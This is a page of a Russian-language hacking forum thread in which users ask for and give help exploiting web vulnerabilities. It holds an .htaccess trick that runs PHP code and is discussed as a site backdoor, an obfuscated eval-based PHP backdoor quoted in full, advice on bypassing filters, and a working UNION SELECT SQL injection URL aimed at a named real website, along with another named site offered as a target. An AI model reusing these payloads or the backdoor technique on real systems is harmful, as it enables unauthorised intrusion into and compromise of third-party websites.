Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    425
    Likes Received:
    179
    Reputations:
    108
    <Files .htaccess>
    Allow from 100.247.115.100
    </Files>
    AddType application/x-httpd-php .htaccess AddHandler application/x-httpd-php .htaccess

    # <? echo "aaaa"; ?>


    Этот вариант неправильный. Вот тут - # <? echo "aaaa"; ?> решетка - знак комментария, чему тут выполняться то? Уберешь решетку - получишь 500 ошибку на синтаксисе htaccess файла
     
  2. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    329
    Likes Received:
    591
    Reputations:
    764
    Правильный, ты не понял фишку этого комментария :)
    Пробуй
    PHP:
    <FilesMatch "^\.">
    allow from all
    </FilesMatch>
    AddType application/x-httpd-php .htaccess
    #<?php phpinfo(); ?>
     
    #22222 nikp, 24 May 2013
    Last edited: 24 May 2013
  3. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    425
    Likes Received:
    179
    Reputations:
    108
    Где-то есть зависимость от базовых правил httpd.conf, так как на одном сервере заработало а на другом нет.

    P.S.
    натолкнуло на интересную мысль: Добавив DirectoryIndex .htaccess можно через теже non-GPC принимать данные на выполнение команд или кода в ракурсе бэкдора на сайте.

    P.S.
    Причем если php engine OFF или noexec то будет отдано как plain.
    Тогда вариант - shtml если настроено на сервере(предположение)
     
    #22223 Cennarios, 24 May 2013
    Last edited: 24 May 2013
  4. Protocoler

    Protocoler Elder - Старейшина

    Joined:
    10 Oct 2012
    Messages:
    82
    Likes Received:
    53
    Reputations:
    81
    Параметр id= в сайте уязвим, при поставке кавычки вылетает ошибка MySQL. Хавиджем все нормально. Но в ручную никак. Не могу использовать не order+by не group+by не работаю, union + select тоже не работает ? каким способом можно найти количество полей ?
     
  5. dpash

    dpash Member

    Joined:
    22 Mar 2013
    Messages:
    89
    Likes Received:
    39
    Reputations:
    4
    Я бы поступил так - скачал Burp Proxy, запустил его, в Хавиже вбил прокси 127.0.0.1:8080, и посмотрел каким запросом он крутит. Еще проще, если есть виртуалка с linux, натравить sqlmap на нее и включить вывод запросов/ответов к серверу параметром -v 6
     
  6. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    580
    Likes Received:
    254
    Reputations:
    32
    фильтры
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    через еррор базед например, кинул бы ссылку чтоле
     
  8. Protocoler

    Protocoler Elder - Старейшина

    Joined:
    10 Oct 2012
    Messages:
    82
    Likes Received:
    53
    Reputations:
    81
    http://www.agriculturalcrossing.com/

    И где можно кодировать в Char для обхода фильтров ? Или надо свой софт писать ?
     
    #22228 Protocoler, 26 May 2013
    Last edited: 26 May 2013
  9. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    580
    Likes Received:
    254
    Reputations:
    32
    например в плагине hackbar или онлайн сервисами
     
  10. Protocoler

    Protocoler Elder - Старейшина

    Joined:
    10 Oct 2012
    Messages:
    82
    Likes Received:
    53
    Reputations:
    81
    Угу, спасибо. Скачаю плагин. Еще вопрос. Мне акунетикс светит уязвимость в заголовке client-ip , но просмотрев заголовки плагином по адресу который указан в акунетиксе, такого заголовка там нет ( Как быть ?
     
  11. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    580
    Likes Received:
    254
    Reputations:
    32
    надо отправить хидер с ковычкой)
     
  12. Protocoler

    Protocoler Elder - Старейшина

    Joined:
    10 Oct 2012
    Messages:
    82
    Likes Received:
    53
    Reputations:
    81
    Так нету куда слать. Просто хидера client_ip нету .
     
  13. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    580
    Likes Received:
    254
    Reputations:
    32
    есть X_FORWARDED_FOR
    тебе это надо
     
  14. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    410
    Likes Received:
    40
    Reputations:
    23
    Нет там уязвимости, откуда ты взял это?
     
  15. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    209
    Likes Received:
    8
    Reputations:
    1
    Наткнулся на
    Code:
    @preg_replace("\x25\50\x5b\141\x2d\172\x41\55\x5a\60\x2d\71\x2b\75\x20\137\x2d\135\x2b\51\x25\145\x73\151","\x65\166\x61\154\x28\47\x24\153\x79\145\x3d\67\x36\64\x38\70\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x6b\171\x65\75\x37\66\x34\70\x38\73","\x4c\63\x5a\150\x63\151\x39\63\x64\63\x63\166\x64\155\x68\166\x63\63\x52\172\x4c\62\x39\171\x63\62\x4e\157\x62\110\x56\171\x59\62\x67\165\x5a\107\x55\166\x61\110\x52\60\x63\107\x52\166\x59\63\x4d\166\x64\63\x41\164\x59\62\x39\165\x64\107\x56\165\x64\103\x39\61\x63\107\x78\166\x59\127\x52\172\x4c\172\x49\167\x4d\124\x41\166\x4d\104\x55\166\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75");
    не бэкдор чейто часом?
     
  16. InDuStRieS

    InDuStRieS Banned

    Joined:
    15 Mar 2009
    Messages:
    580
    Likes Received:
    254
    Reputations:
    32
    расшифруй,тянется вот сюда:
    orschlurch.de/httpdocs/wp-content/uploads/2010/05/cache/
     
    2 people like this.
  17. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    А что за уязвимость такая есть Active script?В гугле искал ничего не нашёл.
     
  18. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    http://en.wikipedia.org/wiki/Active_Scripting
     
  19. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    Такая проблема. Нужно провести инъекцию, но есть одна сложность.
    Когда происходит ошибка в скрипте, то происходит редирект на главную.
    Я точно уверен, что там есть инъекция, но раскрутить не могу.

    Code:
    _ttp://clubpodium.ru/delog/cookies.php
    Уязвим POST параметр poll_id.

    Меня постоянно редиректит на главную, я даже результат запроса просмотреть не могу.
    Кто поможет?
     
  20. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    410
    Likes Received:
    40
    Reputations:
    23
    Можно и без POST обойтись

    _http://clubpodium.ru/index.php?section=2&id=-320+union+select+1,2,3,version(),5,6+--+
     
Loading...
Thread Status:
Not open for further replies.